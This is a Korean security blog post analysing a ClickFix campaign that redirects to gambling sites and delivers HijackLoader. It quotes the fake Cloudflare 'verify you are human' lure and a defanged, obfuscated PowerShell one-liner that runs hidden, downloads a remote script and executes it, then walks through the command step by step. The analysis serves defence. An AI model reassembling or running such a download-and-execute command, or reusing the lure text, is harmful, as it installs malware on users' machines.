오늘은 악성코드 및 도박 사이트 연결하는 클픽픽스(ClickFix) 공격 분석에 대해 알아보겠습니다. 일단 이번 클릭픽스 같은 경우 조금은 처음 보는 방식인 것 같습니다. 보통은 그냥 클릭픽스 공격을 통해서 개인정보를 털어가는 것이 목적인 것 같은데 러시아 쪽인 것으로 추측되어서 해당 공격 방식은 도박 사이트로 연결하는 특징도 있습니다.
공격 사이트
hxxps://sindangkasihnews(.)com -> hxxps://kabarislam(.)id
입니다.
일단 사이트 내용은 다음과 같습니다.
sindangkasihnews(.)com
Verify you are human by completing the action below.
CLOUDFLARE
Confidentiality
Terms and Condiitions
To better prove you are not a robot, please:
1.Press & hold the Windows Key + R.
2.In the verification window, press Ctrl + V.
3.Press Enter on your keyboard to finish.
You will observe and agree:
"I am not a robot - reCAPTCHA Verification ID: 2"
Perform the steps above to finish
verification.
Verify
sindangkasihnews(.)com Needs to review the security of your connection before
proceeding.
인 것을 볼 수가 있습니다. 여기서 가만히 있으면 도박 사이트로 이동하고 여기서 그냥 무의식적으로 절차? 되로 진행했다고 하면 다음과 같은 Powershell 코드를 확보할 수가 있습니다.
Powershell 코드 내용
powershell(.)exe -w h -nop -c "$kh='hxxp'(+)'s';"$b=':'(+)'//'+'alabab(a)baba'(+)'
.'(+)'c(l)oud'(+)'/';"$c='cVG'+'vQi'(+)'o(6)'(+)'.tx(t)';"$om=$kh+$b(+)$c;$i='{0}{
1}{2}' -f 'Net.'(,)'W(e)b','Cl(i)ent';"$rf=New-(O)bject ($i);$kj=$rf.('(D)o(w)nlo
ad'(+)'St(r)ing')($om);Invoke(-)Ex(p)res
sion $kj"코드 분석
1.숨긴 옵션으로 PowerShell 실행
-w h :창(Window) 숨김
-nop: 프로파일 비활성화(시작 스크립트 로드 안 함)
-c: 뒤의 문자열을 명령으로 즉시 실행
2. 문자열 단편화 및 조합
http(+)s->hxxps
+ // + alabababab+(.)+cloud + /->//alababababa(.)cloud
cVG(+)vQi(+)o6(+).txt->cVGvQio6(.)txt
3..NET WebClient*객체 생성
{(0)}{(1)}{(2)}-f Net(.),Web,Client->Net(.)WebClient
New-O(j)ect N(e)t.We(b)Client
4. 원격 스크립트 다운로드
DownloadString(hxxps://alababababa(.)cloud/cVGvQio6(.)txt)
5. 즉시 실행
자바스크립트에서 PowerShell 명령어를 아스키코드 배열로 obfuscate(난독화)해서 있다가
실행 시 해당 배열을 합쳐 실제 PowerShell 명령어로 복원하는 것이 특징
그리고 나서 다운로드 된 파일 안에 있는 코드 실행
악성코드는 hijackloader 입니다.
일단 해당 클릭픽스 같은 수법을 당하지 않으려면 기본적으로 보안 수칙 그리고 수법 그리고 안티 바이러스(백신 프로그램) 같은 것은 반드시 켜두고 사용을 하면 이런 사이트는 특히 불법 사이트에 자주 나타나니 조심하는 것이 좋을 것입니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| 위쳇(Wechat)으로 위장한 스테가노그래피(Steganography)를 악용한 악성코드-Meterpreter 백도어(2024.5.29) (2) | 2025.07.14 |
|---|---|
| 러시아 프로 농구 선수 다닐 카사트킨 (Daniil Kasatkin) 랜섬웨어 공격에 가담한 혐의로 체포 (0) | 2025.07.13 |
| 7-Zip 25.00 보안 업데이트 및 더 많은 CPU 스레드를 지원하고 압축 속도를 향상 (0) | 2025.07.12 |
| 윈도우 11,윈도우 10 KB5062553,KB5062552,KB5062554 보안 업데이트 (0) | 2025.07.10 |
| 북한 코니(Konni)에서 제작한 것으로 추측 되는 악성코드 우리은행 사용자 노린 악성코드 WooriCard_20231108.html.lnk(2 (0) | 2025.07.07 |
| 펌프닷(pump(.)fun) 사칭 ClickFix(클릭픽스) 악성코드 공격 (0) | 2025.07.04 |
| Mozilla Monitor 를 이용한 개인정보 유출 확인 방법 (0) | 2025.07.03 |
| 마이크로소프트는 안티바이러스 프로그램을 커널 수준에서 실행하는 것을 중단 중 (0) | 2025.07.02 |
